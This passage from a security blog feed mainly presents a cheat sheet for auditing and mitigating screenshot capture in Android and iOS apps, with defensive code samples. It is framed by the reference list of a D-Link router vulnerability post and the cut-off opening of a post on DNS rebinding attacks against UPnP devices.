href="https://eu.dlink.com/uk/en/support/support-news/2016/november/10/routers-hnap-service-stack-based-buffer-overflow-vulnerability">https://eu.dlink.com/uk/en/support/support-news/2016/november/10/routers-hnap-service-stack-based-buffer-overflow-vulnerability</a></span></li><li><span style="white-space: pre-wrap;"><a href="https://packetstormsecurity.com/files/139611/D-Link-DIR-Routers-HNAP-Login-Stack-Buffer-Overflow.html">https://packetstormsecurity.com/files/139611/D-Link-DIR-Routers-HNAP-Login-Stack-Buffer-Overflow.html</a></span></li><li><span style="white-space: pre-wrap;"><a href="https://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_bof/">https://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_bof/</a></span></li></ul><p></p></div><h4><b><span style="font-family: helvetica;">Authors</span></b></h4><div><span style="font-family: helvetica;">Alessandro Braccio</span></div><div><span style="font-family: helvetica;">Giovanni Guido</span></div></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-32072627701264590952021-05-27T06:54:00.003-07:002021-05-27T06:55:50.907-07:00Mobile Screenshot Prevention Cheatsheet - Testing and Fixing<style>
.post ul li {
list-style: circle inside;
margin-left: 20px;
margin-bottom: 0px;
font-size: 14px;
}
.post blockquote{
box-sizing border-box;
color rgb(102, 102, 102);
display inline;
padding: 10px 10px 10px 10px;
font-family Poppins, sans-serif;
font-size 14px;
font-stretch 100%;
font-style italic;
font-variant-caps normal;
font-variant-east-asian normal;
font-variant-ligatures normal;
font-variant-numeric normal;
font-weight 300;
height auto;
line-height 28px;
overflow-wrap break-word;
text-align left;
text-size-adjust 100%;
width auto;
word-break break-word;
-webkit-tap-highlight-color rgba(0, 0, 0, 0);
background:#EDEDED;
}
</style>
<h1 style="line-height: 1.38; margin-bottom: 3pt; margin-top: 0pt;">
Mobile Screenshot Prevention Cheat Sheet - Testing and Fixing
</h1>
<div>
<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKkaHBQr1Q_NduSGmMgU2g3AfrKQIy-Sa1vWprMpoDXzTXxq3DiOt5U2jcJ7vRe3CagBzuGOO0hjh9gBXJ905gdCwCJqeoQ0EPqHtKuAkRo1dOzpyk9zOZanlVUcaKxifgyTDR6x8Vjod/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="512" data-original-width="512" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhKkaHBQr1Q_NduSGmMgU2g3AfrKQIy-Sa1vWprMpoDXzTXxq3DiOt5U2jcJ7vRe3CagBzuGOO0hjh9gBXJ905gdCwCJqeoQ0EPqHtKuAkRo1dOzpyk9zOZanlVUcaKxifgyTDR6x8Vjod/" width="240" /></a></div><br /></div><br />The following article will explain how to test
mobile applications against any implemented screenshot prevention
mechanism and then it will try to propose mitigations to such
problem according to the context.
</div>
<div><br /></div>
<div>
The following article is the second part of <b><a href="https://blog.mindedsecurity.com/2020/10/mobile-screenshot-prevention.html">Mobile Screenshot Prevention Cheat Sheet - Risks and Scenarios</a> </b>published on <a href="https://blog.mindedsecurity.com/">IMQ Minded Security blog.</a></div>
<div><br /></div><div><b>TLDR</b>; None of the proposed solutions will provide a full protection against screenshotting. Therefore all of them shall be considered as mitigations.</div><div><br /></div><div><h2>Auditing Screenshot Prevention</h2></div>
<div>
In this section we will focus on testing and preventing mobile screenshot via static (e.g. perform a secure code review or a mobile application reverse
engineering task) and dynamic (e.g. test a mobile
application in its execution environment) contexts.
</div>
<div><br /></div>
<div><span style="background-color: white;"><u>First things first: a</u></span><span style="background-color: white;">nyone approaching mobile application security </span><span style="background-color: white;">should carefully read the </span><span style="background-color: white;">OWASP Mobile Security Testing Guide (MSTG)<a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9" target="_blank">[1]</a><a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9" target="_blank">[2]</a></span><span style="background-color: white;">.</span></div><div><br /></div><div><h4 style="text-align: left;">Static Analysis</h4></div><div>Assuming we have the source code of a mobile application and we have to
check if the app implements any mitigation against screenshot attacks,
either user or system generated. </div><div>What should we look for?
</div><div><br /></div>
<h3 style="text-align: left;">Android</h3>
<div>
Usually the common remediation is to set <span style="font-family: courier;">FLAG_SECURE</span> to LayoutParam, hence the first step is to search for it in the codebase. </div><div>But, if we have
access to the source code of an application somehow decompiled from a packaged application, it might be possible that the
<span style="font-family: courier;">FLAG_SECURE</span> keyword could have been
<i>obfuscated </i>or <i>replaced</i> with its integer value.
</div><div><br /></div><div>Therefore, the values to search for, are:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">FLAG_SECURE</span> (high level symbol)
</li>
<li>8192 (numeric value)</li>
<li>0x00002000 (hexadecimal numeric value)</li>
</ul>
<div>
If any of those values are found, it must be checked whether it is used as parameter set to the <a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams" target="_blank">WindowManager LayoutParams</a>.
</div><div><br /></div>
</div>
<div>
It should be noted that this flag must be set in all the Android <i>Activities</i>
involved in the application and it would be effective for both user and system
generated screenshots.</div><div><br /></div><h3 style="text-align: left;">iOS</h3>
<div>
Since in <i><u>iOS</u></i> it is <i><u>not possible to prevent user generated screenshots</u></i>, we have
to search for any code related to the notification system which can be used to
provide awareness about the taken screenshot.
</div>
<div>It is then possible to search for the following keywords:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">userDidTakeScreenshotNotification</span>
(Swift)
</li>
<li>
<span style="font-family: courier;">UIApplicationUserDidTakeScreenshotNotification</span>
(Objective-C)
</li>
</ul>
<div>
If any of the following keywords is found, it would be possible to then
observe a function callback being executed after a user generated screenshot
has been created.
</div>
</div>
<div><br /></div>
<div>
On the other hand, for system generated screenshots, it would be necessary to
analyze pieces of code which are responsible to handle the transitions between
foreground and background application statuses.
</div>
<div>
Since the system generated screenshots are generated just before the
application has been put in the background status, in these portions of code,
if any remediation has been implemented, we are expecting to find some
mechanism which would hide or obfuscate sensitive parts of the UI just before
the screenshot has been generated.
</div>
<div>
<div>It would then be possible to search for the possible values:</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: courier;">applicationWillResignActive</span>
(here we should find pieces of code hiding parts of the UI, e.g. by
setting the <span style="font-family: courier;">hidden</span> property
on a view)
</li>
<li>
<span style="font-family: courier;">applicationDidBecomeActive</span>
(here we should find pieces of code showing parts of the UI, e.g. by
unsetting the <span style="font-family: courier;">hidden</span> property
on a view)
</li>
</ul>
</div>
<div><br /></div>
<div><ul></ul></div>
</div>
<h4 style="text-align: left;">Dynamic Analysis</h4>
<div>
TLDR; Let's try to generate a screenshot of the application and let's check if
the application UI is shown in the device task manager.
</div>
<div><br /></div>
<h3 style="text-align: left;">User Generated Screenshots</h3>
<div>
First of all, let's focus on how we can generate a screenshot of our running
application. Basically it will depend on which OS and device type we are
testing.
</div>
<div><br /></div>
<div>
On a variety of Android devices, it is possible to generate a screenshot by
using device specific combo keys. The most common combinations are:
</div>
<div>
<ul style="text-align: left;">
<li>VOLUME DOWN + POWER</li>
<li>VULUME UP + POWER</li>
</ul>
<div>
It would be also possible to generate a screenshot by using the function
tile in the system tray, but it strongly depends on the OS customizations.
</div>
</div>
<div><br /></div>
<div>
If we are using the Android emulator, we can use the specific button on the
emulator toolbar:
</div>
<div><br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnGhYA-5UuE1z3H8-p3YRGVQdTjPRY-COdHDABS2e617Hp4aA5OLt1oUr4kEBjPeJGYZ13AEjFtkEbPxH0bKYzGbRnAu_5D_UX_LErS7mgzomrz45fBE7g60AxWIjhKSJFUDObFlNDMO4/s63/android_emu1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="45" data-original-width="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnGhYA-5UuE1z3H8-p3YRGVQdTjPRY-COdHDABS2e617Hp4aA5OLt1oUr4kEBjPeJGYZ13AEjFtkEbPxH0bKYzGbRnAu_5D_UX_LErS7mgzomrz45fBE7g60AxWIjhKSJFUDObFlNDMO4/s0/android_emu1.png" /></a>
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
</div>
<div>
On iOS it depends on which physical keys are available on the target device.
The two possible combo keys are:
</div>
<div>
<ul style="text-align: left;">
<li>POWER + HOME</li>
<li>VOLUME UP + POWER</li>
</ul>
<div>
Finally, if we are using the iOS simulator, we can use the combo key
<span style="font-family: courier;">CMD + S</span> or we can use the drop
down menu entry under
<span style="font-family: courier;">File -> New Screen Shot</span>.
</div>
</div>
<div><br /></div>
<div>
In all the above cases, the positive probe is the successful generation of a
screenshot containing the same views actually on the device's screen, without
any kind of modification and without any kind of notification generated on the
device.
</div>
<div><br /></div>
<div>
If the running application is properly secured, we will see the following
notification being generated on Android:
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6p8-NUrd_Jb45zVMg1-brf4LRYvqkKYLO8N1UWwBiSGxVvt0KmBstFaDHyDrORHRBGB9kzglqH6BjTdb1Hf9wkhxgmcYBnuhj7Obqm_b1v5kwstZ1hdcgQoV1WVPasOyuFeg_LNNrYgE/s655/android_notification1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="655" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6p8-NUrd_Jb45zVMg1-brf4LRYvqkKYLO8N1UWwBiSGxVvt0KmBstFaDHyDrORHRBGB9kzglqH6BjTdb1Hf9wkhxgmcYBnuhj7Obqm_b1v5kwstZ1hdcgQoV1WVPasOyuFeg_LNNrYgE/s320/android_notification1.png" width="320" /></a>
</div>
<div><br /></div>
<div>
On the other hand, since in iOS it is not possible to prevent a user to
generate a screenshot of the application, if the running app is implementing a
mitigation against screenshot generation it is not actually possible to define
which behavior a pentester would see.
</div>
<div>Some possible mitigations are:</div>
<div>
<ul style="text-align: left;">
<li>The screenshot is partially obfuscated</li>
<li>A notification warns the user about the just generated screenshot</li>
<li>
The application shows a message which informs the user about the just
generated screenshot
</li>
</ul>
<div>
Beware that also a transparent and invisible mechanism could be implemented
on iOS in order to warn the user about the screenshot generation, so dynamic
analysis could not be sufficient in order to fully understand if an app is
implementing some mitigation mechanism.
</div>
<div><br /></div>
</div>
<div><h3 style="text-align: left;">System Generated Screenshots (AKA Task Manager Screenshots)</h3></div>
<div>
On both the operating systems, the test is the same and is pretty
straightforward:
</div>
<div>
<ul style="text-align: left;">
<li>Open the target application</li>
<li>Send the application in background by pressing the HOME button</li>
<li>
Open the system task manager (e.g. by tapping the dedicated button on
Android or by double tapping the home button on iOS, etc)
</li>
</ul>
<div>
At this point, if an application screenshot is shown identical as it was
possible to observe when the app was in foreground, it means that no
prevention mechanism was implemented.
</div>
</div>
<div>
On the other hand, if a blank screen is shown or if the image is partially
obfuscated, it does mean that the app is actually implementing some sort of
full or partial prevention mechanism against system generated screenshots.
</div>
<div><br /></div>
<div>
<div><h2>Fixing Screenshot Issues</h2></div><div><br /></div>
</div>
<div style="text-align: left;">
Which APIs are provided to prevent or mitigate the issue?
</div>
<h4 style="text-align: left;"><br /></h4><h3 style="text-align: left;">Android</h3>
<div>One flag to rule them all.</div>
<div>
Basically Android offers the LayoutParam
<span style="font-family: courier;">FLAG_SECURE </span><span style="font-family: inherit;"><a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE" target="_blank">[3]</a></span> which can be used to prevent
both user and system generated screenshots.</div><div><br /></div><div>Simple and straightforward.<br />
</div>
<div><br /></div>
<h3 style="text-align: left;">iOS</h3>
<div>
On iOS the developer is not provided the ability to prevent user generated
screenshots. This is due to the strict UI/UX guidelines provided by Apple
which are preventing developers from interfering with the standard OS
behavior.
</div>
<div>
Two kinds of APIs are interesting from the security point of view, when
talking about screenshot prevention mechanisms.
</div>
<div><br /></div>
<div>
For <b>user generated</b> screenshots it is possible to use the <span style="font-family: courier;">userDidTakeScreenshotNotification </span><span style="font-family: inherit;"><a href="https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio" target="_blank">[4]</a></span><span style="font-family: courier;"> </span><span style="font-family: inherit;">system wide notification. In this way, it would be possible to run code
just after a screenshot was generated. </span>
</div>
<div>
<span style="font-family: inherit;">The most common approach is to generate a notification or an alert which
warns the user about the generated screenshot. This would inform the user
and will raise a red flag in case of the screenshot was not explicitly and
voluntarily generated.</span>
</div>
<div><br /></div>
<div>
On the other hand, for <b>system generated</b> screenshots, it is possible to
refer to the <span style="font-family: courier;">applicationWillResignActive </span><span style="font-family: inherit;"><a href="https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive" target="_blank">[5]</a></span><span style="font-family: courier;"> </span><span style="font-family: inherit;">application's lifecycle callback. This callback is invoked just before any
application is moved from the foreground to the background and enables
developers to execute code just before the system generated screenshots are
created.</span>
</div>
<div>
<span style="font-family: inherit;">These operations can include:</span>
</div>
<div>
<ul style="text-align: left;">
<li>
<span style="font-family: inherit;">Putting an overlay over the whole application window</span>
</li>
<li>
<span style="font-family: inherit;">Hiding/masking sensitive parts of the UI</span>
</li>
<li>
Navigating to other application parts which are not showing sensitive
information
</li>
</ul><div><br /></div>
<h2 style="text-align: left;">Stop talking! Show me the code!</h2></div><div>This section is intentionally left without any comment, since explanations
have been provided in the above sections.</div>
<div>
Just the source code that can be used in various scenarios and situations.
</div>
<div>
Pro tip: If some data is VERY sensitive, such as the combination of a credit
card PAN, its PIN code and the CVV2 code, don't put it in your views. If some
data is not displayed on the screen, it can't be screenshotted!
</div>
<div><br /></div>
<div>
But since in the real world such approach is very often not applicable, let's
dig into some mitigation implementations.
</div>
<div><br /></div>
<h4 style="text-align: left;">Android</h4>
<div>Protects from:</div>
<div>
<ul style="text-align: left;">
<li>User generated screenshots: ✔️</li>
<li>System Generated screenshots: ✔️</li>
</ul><div><br /></div>
<h3 style="text-align: left;"><b>Kotlin</b></h3>
</div><blockquote><div><blockquote><div>import android.os.Bundle</div>
<div>import android.support.v7.app.AppCompatActivity</div>
<div>import android.view.WindowManager</div>
<div><br /></div>
<div>class MainActivity : AppCompatActivity() {</div>
<div> override fun onCreate(savedInstanceState: Bundle?) {</div>
<div> super.onCreate(savedInstanceState)</div>
<div> setContentView(R.layout.activity_main)</div>
<div> window.setFlags(</div>
<div> WindowManager.LayoutParams.FLAG_SECURE,</div>
<div> WindowManager.LayoutParams.FLAG_SECURE</div>
<div> )</div>
<div> }</div>
<div>}</div></blockquote><div></div>
</div>
<div></div></blockquote><div><br /></div>
<div><br /></div>
<h3 style="text-align: left;"><b>Java</b></h3>
<div><br /></div>
<div>
<div></div><blockquote><div>import android.os.Bundle;</div>
<div>import android.view.WindowManager;</div>
<div><br /></div>
<div>public class MainActivity extends Activity {</div>
<div><br /></div>
<div> @Override</div>
<div> protected void onCreate(Bundle savedInstanceState) {</div>
<div> super.onCreate(savedInstanceState);</div>
<div><br /></div>
<div> getWindow().setFlags(</div>
<div>
WindowManager.LayoutParams.FLAG_SECURE,
</div>
<div>
WindowManager.LayoutParams.FLAG_SECURE
</div>
<div> );</div>
<div> }</div>
<div>}</div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>References: <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9" target="_blank">[6]</a></div><div><br /></div>
<h4 style="text-align: left;">iOS</h4>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>
User generated screenshots: <span face=""Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif" id="emoji-info-value" style="background-color: white; box-sizing: border-box; color: black; font-size: 21.3333px; text-align: center; text-decoration-line: none; transition: color 0.25s ease 0s;"><a href="https://emojikeyboard.org/copy/Person_Shrugging_Emoji_%F0%9F%A4%B7" id="emoji-info-url" style="background-color: white; box-sizing: border-box; color: black; font-family: "Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 21.3333px; text-align: center; text-decoration-line: none; transition: color 0.25s ease 0s;">🤷</a> </span><span style="background-color: white; box-sizing: border-box; color: black; text-align: center; text-decoration-line: none; transition: color 0.25s ease 0s;"><span style="font-family: inherit;">(partial)</span></span>
</li>
<li>System Generated screenshots: ❌</li>
</ul><div><br /></div>
<h3 style="text-align: left;"><b>Swift</b></h3></div></div>
<div>
<div></div><blockquote><div>NotificationCenter.default.addObserver(</div>
<div>
forName: UIApplication.userDidTakeScreenshotNotification,
</div>
<div> object: nil,</div>
<div> queue: .main) { notification in</div>
<div>
//Notify the user, log the action, etc...
</div>
<div>}</div></blockquote><div></div>
</div>
<div><br /></div>
<h3 style="text-align: left;"><b>Objective-C</b></h3>
<div>
<div></div><blockquote><div>NSOperationQueue *mainQueue = [NSOperationQueue mainQueue];</div>
<div>
[[NSNotificationCenter defaultCenter]
addObserverForName:UIApplicationUserDidTakeScreenshotNotification
</div>
<div>
object:nil
</div>
<div>
queue:mainQueue
</div>
<div>
usingBlock:^(NSNotification *note) {
</div>
<div>
//Notify the user, log the action, etc...
</div>
<div>
}];
</div></blockquote><div></div>
</div>
<div><br /></div>
<div><div>References: <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9" target="_blank">[6]</a> <a href="https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot" target="_blank">[7]</a></div></div>
<div><br /></div>
<div><br /></div>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>User generated screenshots: ❌</li>
<li>System Generated screenshots: ✔️</li>
</ul>
<div>
<div><br /></div>
<div>
<div></div><blockquote><div>
- (void)applicationWillResignActive:(UIApplication *)application {
</div>
<div> </div>
<div> // hide main window</div>
<div> self.window.hidden = YES;</div>
<div>}</div>
<div><br /></div>
<div>
- (void)applicationDidBecomeActive:(UIApplication *)application {
</div>
<div> </div>
<div> // show window back</div>
<div> self.window.hidden = NO;</div>
<div>}</div></blockquote><div></div>
</div>
<div><br /></div>
</div>
</div>
</div>
<div>References: <a href="http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/" target="_blank">[8]</a></div><div><br /></div>
<h4 style="text-align: left;">React Native</h4>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>Android User generated screenshots: ✔️</li>
<li>Android System Generated screenshots: ✔️</li>
<li>
iOS User generated screenshots: <span face=""Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif" id="emoji-info-value" style="background-color: white; box-sizing: border-box; font-size: 21.3333px; text-align: center; transition: color 0.25s ease 0s;"><a href="https://emojikeyboard.org/copy/Person_Shrugging_Emoji_%F0%9F%A4%B7" id="emoji-info-url" style="box-sizing: border-box; color: black; font-size: 21.3333px; text-decoration-line: none; transition: color 0.25s ease 0s;">🤷</a> </span><span style="background-color: white; box-sizing: border-box; text-align: center; transition: color 0.25s ease 0s;"><span style="font-family: inherit;">(partial)</span></span>
</li>
<li>iOS System Generated screenshots: ❌</li>
</ul><div><br /></div>
</div>
</div>
<h3 style="text-align: left;"><b>Android</b></h3>
<div>
<div></div><blockquote><div></div><blockquote><div>import android.os.Bundle;</div>
<div>import com.facebook.react.ReactActivity;</div>
<div>import android.view.WindowManager;</div>
<div><br /></div>
<div>public class MainActivity extends ReactActivity {</div>
<div><br /></div>
<div> @Override</div>
<div> protected void onCreate(Bundle savedInstanceState) {</div>
<div> super.onCreate(savedInstanceState);</div>
<div><br /></div>
<div> getWindow().setFlags(</div>
<div>
WindowManager.LayoutParams.FLAG_SECURE,
</div>
<div>
WindowManager.LayoutParams.FLAG_SECURE
</div>
<div> );</div>
<div> }</div>
<div>}</div></blockquote><div></div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<h3 style="text-align: left;"><b>iOS</b></h3>
<div>
<div></div><blockquote><div></div><blockquote><div>import React from 'react'</div>
<div>import { AppState, Platform, View } from 'react-native'</div>
<div><br /></div>
<div>const SecurityScreen = () => <View /></div>
<div><br /></div>
<div>const showSecurityScreenFromAppState = appState =></div>
<div> ['background', 'inactive'].includes(appState)</div>
<div><br /></div>
<div>const withSecurityScreenIOS = Wrapped => {</div>
<div> return class WithSecurityScreen extends React.Component {</div>
<div> state = {</div>
<div>
showSecurityScreen:
showSecurityScreenFromAppState(AppState.currentState)
</div>
<div> }</div>
<div><br /></div>
<div> componentDidMount () {</div>
<div>
AppState.addEventListener('change',
this.onChangeAppState)
</div>
<div> }</div>
<div> </div>
<div> componentWillUnmount () {</div>
<div>
AppState.removeEventListener('change',
this.onChangeAppState)
</div>
<div> }</div>
<div> </div>
<div> onChangeAppState = nextAppState => {</div>
<div>
const showSecurityScreen =
showSecurityScreenFromAppState(nextAppState)
</div>
<div><br /></div>
<div> this.setState({ showSecurityScreen })</div>
<div> } </div>
<div><br /></div>
<div> render() {</div>
<div> return this.state.showSecurityScreen</div>
<div> ? <SecurityScreen /></div>
<div> : <Wrapped {...this.props} /></div>
<div> }</div>
<div> }</div>
<div>}</div>
<div><br /></div>
<div>const withSecurityScreenAndroid = Wrapped => Wrapped</div>
<div><br /></div>
<div>export const withSecurityScreen = Platform.OS === 'ios'</div>
<div> ? withSecurityScreenIOS</div>
<div> : withSecurityScreenAndroid</div></blockquote><div></div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>Then, in your App component:</div>
<div><br /></div>
<div>
<div></div><blockquote><div>import { withSecurityScreen } from './withSecurityScreen'</div>
<div>...</div>
<div>export default withSecurityScreen(App);</div></blockquote><div></div>
</div>
<div><br /></div>
<div><br /></div>
<div>Pre bundled libraries are also available on NPM <a href="https://www.npmjs.com/package/react-native-obscure" target="_blank">[10]</a>.</div>
<div><br /></div>
<div>References:<a href="https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de" target="_blank"> [9]</a> <a href="https://www.npmjs.com/package/react-native-obscure" target="_blank">[10]</a></div><div><br /></div>
<h4 style="text-align: left;">Cordova / Ionic</h4>
<div>
There are many Cordova plugins which can help on achieving the goal.
</div>
<div>
A good place to start is the
<b>cordova-plugin-prevent-screenshot-coffice </b>open source repository.
</div>
<div><br /></div>
<div>
<div>Protects from:</div>
<div>
<ul>
<li>Android User generated screenshots: ✔️</li>
<li>Android System Generated screenshots: ✔️</li>
<li>
iOS User generated screenshots: <span face=""Source Sans Pro", "Helvetica Neue", Helvetica, Arial, sans-serif" id="emoji-info-value" style="background-color: white; box-sizing: border-box; font-size: 21.3333px; text-align: center; transition: color 0.25s ease 0s;"><a href="https://emojikeyboard.org/copy/Person_Shrugging_Emoji_%F0%9F%A4%B7" id="emoji-info-url" style="box-sizing: border-box; color: black; font-size: 21.3333px; text-decoration-line: none; transition: color 0.25s ease 0s;">🤷</a> </span><span style="background-color: white; box-sizing: border-box; text-align: center; transition: color 0.25s ease 0s;"><span style="font-family: inherit;">(partial)</span></span>
</li>
<li>iOS System Generated screenshots: ❌</li>
</ul>
<div>References: <a href="https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice">[11]</a></div>
</div>
</div>
<div><br /></div>
<h4 style="text-align: left;">Commercial Solutions</h4>
<div>Several commercial solutions are available on the market, however since there was no easy way to test any of them, this blog post will not promote or endorse
any commercial tool.
</div>
<div><br /></div>
<h2 style="text-align: left;">Conclusions - Wrapping it up</h2><div>TLDR; None of the proposed solutions will provide a full protection against screenshotting, therefore all of them should be considered as mitigations.</div><div><br /></div>
<div>
Since all the OSs handle the application status transitions in a
different way, and different versions of OSs behave in a
different way, it will always be possible to generate some sort of
bypass of any implemented mitigation mechanism.
</div>
<div>
Moreover, let's say that if an application is running on an untrusted - jailbroken or rooted - device environment it is easy for an
attacker to hook and bypass any kind of protection with some effort.</div>
<div><br /></div><div>
The chosen mitigation should then be biased on which data the application is
showing on the screen and how much sensitive is this data.
</div>
<div>
Examples of such mitigation bypass are available in literature, such as <a href="https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284" target="_blank">[12]</a>.
</div><div><br /></div>
<h2 style="text-align: left;">References</h2>
<div>
<div>
[1] -
<a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9">https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06d-testing-data-storage#testing-auto-generated-screenshots-for-sensitive-information-mstg-storage-9</a> </div>
<div>
[2] -
<a href="https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9">https://mobile-security.gitbook.io/mobile-security-testing-guide/android-testing-guide/0x05d-testing-data-storage#finding-sensitive-information-in-auto-generated-screenshots-mstg-storage-9
</a></div>
</div>
<div>
[3] -
<a href="https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE">https://developer.android.com/reference/android/view/WindowManager.LayoutParams#FLAG_SECURE
</a></div>
<div>
[4]
- <a href="https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio">https://developer.apple.com/documentation/uikit/uiapplication/1622966-userdidtakescreenshotnotificatio
</a></div>
<div>
[5]
- <a href="https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive">https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1622950-applicationwillresignactive
</a></div>
<div>
[6]
- <a href="https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9">https://medium.com/nomtek/screenshot-preventing-on-mobile-apps-9e62f51643e9
</a></div>
<div>
[7]
- <a href="https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot">https://stackoverflow.com/questions/13484516/ios-detection-of-screenshot
</a></div>
<div>
[8]
- <a href="http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/">http://pinkstone.co.uk/how-to-control-the-preview-screenshot-in-the-ios-multitasking-switcher/
</a></div>
<div>
[9]
- <a href="https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de">https://medium.com/@jonaskuiler/creating-a-security-screen-on-ios-and-android-in-react-native-97703092e2de
</a></div>
<div>[10] - <a href="https://www.npmjs.com/package/react-native-obscure">https://www.npmjs.com/package/react-native-obscure</a></div>
<div>
[11]
- <a href="https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice">https://github.com/flotrugliocoffice/cordova-plugin-prevent-screenshot-coffice
</a></div>
<div>
<div>
[12]
- <a href="https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284">https://medium.com/@techhelpkb/bypass-an-android-apps-screenshot-restriction-34ee4b79b284
</a></div>
<div><br /></div>
<div><br /></div>
<div><br /></div>
</div>
<div><br /></div>
Martino Lessiohttp://www.blogger.com/profile/15529162337412441148noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-62963135666435357752021-02-26T02:17:00.012-08:002021-02-26T02:21:01.714-08:00A Journey Into the Beauty of DNSRebinding - Part 1<h3><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1lSZSDJJEuehJnUEe5dQ1Io-DqJs6ZP9mz4OkKORszTHKr-3hQJHz5eOhQ2MROJ2C5wFSBbBRlYv2dYIGL5AJ3Ery59-lFG10caA0LFusokKrRVEqPKKoI6udPReEJduoGiwlWb61wpRh/s253/DNS_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="225" data-original-width="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1lSZSDJJEuehJnUEe5dQ1Io-DqJs6ZP9mz4OkKORszTHKr-3hQJHz5eOhQ2MROJ2C5wFSBbBRlYv2dYIGL5AJ3Ery59-lFG10caA0LFusokKrRVEqPKKoI6udPReEJduoGiwlWb61wpRh/s0/DNS_2.jpg" /></a></div><br />Authors</h3><p style="text-align: left;">Giovanni Guido<br />Alessandro Braccio</p><p></p><h3 style="text-align: left;">Abstract</h3><p style="text-align: justify;">In this first blog post about <i>DNS rebinding</i><b> </b>topic, we are going to show a practical example of <b>DNS Rebinding attack against UPnP services</b> exposed in a local network. </p><p style="text-align: justify;">The goal of this post series is to show real attack scenarios against devices exposing services on a local network. </p><div style="text-align: justify;"><p>That case study tends to happen usually on <b>IoT interconnected home or smart office devices</b>, which are a very interesting scenario from an attacker perspective.</p></div><h3 style="text-align: justify;">Introduction</h3><p style="text-align: justify;">Nowadays, IoT devices are around us in every environment, starting from our home in which smart devices interact with each other in order to simplify our daily tasks. These devices usually use different protocols in their communication, from common HTTP requests to Bluetooth Low Energy, but also pretty old protocols that are having a comeback such as <a href="https://tools.ietf.org/html/rfc6970" target="_blank">UPnP ( Universal Plug and Play )</a>.</p><p style="text-align: justify;">The main and most sensitive part of the services implemented by IoT smart devices are usually not directly exposed over the external network, therefore an attacker would need to gain a position within the local network in order to exploit them. </p><p style="text-align: justify;">The purpose of this first post is to give an overview of the DNS Rebinding attack technique and to show a practical example involving common UPnP services implemented by typical home devices, such as routers.</p><h3 style="text-align: left;">The DNS Rebinding Attack</h3><div style="text-align: justify;"><div><p>In short, <a href="https://crypto.stanford.edu/dns/ " target="_blank">DNS Rebinding</a> is an attack technique that allows to bypass the <a 